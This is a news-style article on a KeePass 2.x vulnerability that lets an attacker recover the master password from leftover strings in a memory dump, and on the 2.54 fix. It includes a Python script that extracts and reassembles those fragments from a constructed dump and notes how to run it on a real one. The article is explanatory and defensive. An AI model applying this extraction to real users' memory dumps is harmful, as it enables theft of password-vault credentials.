Bug in KeePass Open Source Password Manager
This is the second time the researcher has found a flaw in this password manager, but this one is considerably worse: it affects all KeePass 2.x versions on Windows, Linux, and macOS, and an attacker who can read the application's memory can recover the master password even after the workspace has been closed.
The maintainer has developed a fix, but it will only ship in early June with the release of version 2.54.
The researcher who uncovered the vulnerability has published a proof-of-concept on GitHub and said that "no code execution on the target system is required, just a memory dump." It does not matter where that memory comes from: a dump of the running process, the swap or pagefile, or a hibernation file all serve, and from any of them the attacker can retrieve the master password.
Physical access to the host's filesystem is not required either. A remote attacker can obtain such a dump through malware delivered by phishing, an exploit, or other means.
Even so, the researcher said there is no need to panic.
The flaw lies in the custom text box KeePass uses for entering the master password. Each time a character is typed, the control leaves behind a string in memory made up of the masking characters for everything typed so far followed by the new character. An attacker who can read that memory collects these leftover strings and reassembles the password in cleartext: the fourth character s leaves behind ***s, and the sixth character 0 leaves behind *****0. (The first keystroke leaves a bare character with no mask prefix, so only the second character onward can be recovered this way.)
Malware already running on the machine can dump the KeePass process's memory and send the dump, together with the database file, to the attacker's server. The attacker can then extract the master password at leisure and open the database.
The fix in 2.54 inserts random dummy text into the application's memory so that the leftover strings can no longer be matched unambiguously to the real keystrokes. Until it ships, installations remain exposed, although a test build containing the fix can be downloaded from the official KeePass website. Upgrading does not clean up memory copies that already exist on disk, so changing the master password after upgrading is the prudent follow-up.
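The following script, added here as an illustration and not taken from the researcher's proof-of-concept or from KeePass, shows both halves of the story above: how the mask-prefixed leftover strings can be pulled out of a memory image and reassembled into the password, and why adding random dummy fragments (the approach the 2.54 fix takes) makes that reassembly ambiguous. The memory dump is constructed inline; the masking glyph (U+25CF), the filler strings and the dummy fragments are assumptions for the demonstration, and the first character is reported as "?" because it never acquires a mask prefix.

```python
import re

# Assumption: the masking glyph is U+25CF BLACK CIRCLE. The article writes the
# leftover fragments as "***s"; only the "n masks then one real character" shape matters.
BULLET = "\u25cf"
ENC = "utf-16-le"                      # .NET keeps string payloads as UTF-16LE in memory
BULLET_BYTES = BULLET.encode(ENC)      # b"\xcf%"
# One or more encoded masks followed by one UTF-16 code unit (two bytes).
FRAGMENT_RE = re.compile(rb"(?:" + re.escape(BULLET_BYTES) + rb")+(..)", re.DOTALL)


def typing_fragments(password: str) -> list[str]:
    """Leftover strings the article describes: after the k-th keystroke a string of
    k-1 masks followed by the k-th character stays behind in memory."""
    return [BULLET * i + ch for i, ch in enumerate(password)]


def build_dump(strings: list[str], filler: list[str]) -> bytes:
    """Constructed stand-in for a memory dump: the given strings as UTF-16LE,
    each preceded by an unrelated string and separated by zero padding."""
    out = b"\x00" * 16
    for i, s in enumerate(strings):
        out += filler[i % len(filler)].encode(ENC) + b"\x00" * 4
        out += s.encode(ENC) + b"\x00" * 6
    return out


def extract_candidates(dump: bytes) -> dict[int, set[str]]:
    """Map mask-count -> set of characters seen right after that many masks."""
    found: dict[int, set[str]] = {}
    for m in FRAGMENT_RE.finditer(dump):
        masks = (m.start(1) - m.start()) // len(BULLET_BYTES)
        ch = m.group(1).decode(ENC, errors="replace")
        if ch == "\ufffd" or ord(ch) < 0x20:   # padding or a broken code unit after masks
            continue
        found.setdefault(masks, set()).add(ch)
    return found


def reconstruct(dump: bytes) -> str:
    """Rebuild the typed password. Position 1 is always '?': the first keystroke
    leaves a bare character with no mask prefix to find it by. Positions where
    several characters were seen (dummy fragments, as in the fix) appear as {a|b}."""
    cands = extract_candidates(dump)
    if not cands:
        return ""
    out = ["?"]
    for pos in range(1, max(cands) + 1):
        chars = sorted(cands.get(pos, ()))
        if len(chars) == 1:
            out.append(chars[0])
        else:
            out.append("{" + "|".join(chars) + "}" if chars else "?")
    return "".join(out)


FILLER = ["KeePass.exe", "Open Database", "C:\\vault.kdbx"]   # constructed unrelated strings


def demo(password: str = "Tr0ub4dor") -> tuple[str, str]:
    """Return (recovered password from a vulnerable build, result once dummy fragments exist)."""
    frags = typing_fragments(password)[::-1]               # order in memory does not matter
    plain = reconstruct(build_dump(frags, FILLER))
    # Assumed model of the fix: dummy fragments shaped exactly like real leftovers.
    decoys = [BULLET * 2 + "x", BULLET * 4 + "q"]
    obscured = reconstruct(build_dump(frags + decoys, FILLER))
    return plain, obscured


if __name__ == "__main__":
    before, after = demo()
    print("vulnerable build :", before)   # ?r0ub4dor
    print("with dummy text  :", after)    # ?r{0|x}u{b|q}4dor
```

The scan works on raw bytes rather than on a decoded string so that it finds fragments wherever they sit in the image; on a real dump you would read the file with `open(path, "rb").read()` in place of `build_dump`. With only two dummy fragments the recovered value already has four candidates instead of one, and the number grows with every extra decoy per position.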
Password managers are high-value targets, and this is not the first time security researchers have found a serious weakness in KeePass.
To keep yourself safe from these threats, avoid installing software from unreliable sources, do not open files from senders you do not know, and stay away from questionable websites that may drop malware onto your computer. If you are using Windows, run an antivirus product.
Do not share your master password with anyone.
Attackers continually probe popular applications for weaknesses and have mature tooling for finding and exploiting them.
Password managers, when properly implemented and used correctly, are generally considered safe and secure tools for managing passwords. They offer clear advantages over the alternatives, such as weak or reused passwords or passwords written down on paper. But, like any software or service, they carry their own risks and vulnerabilities.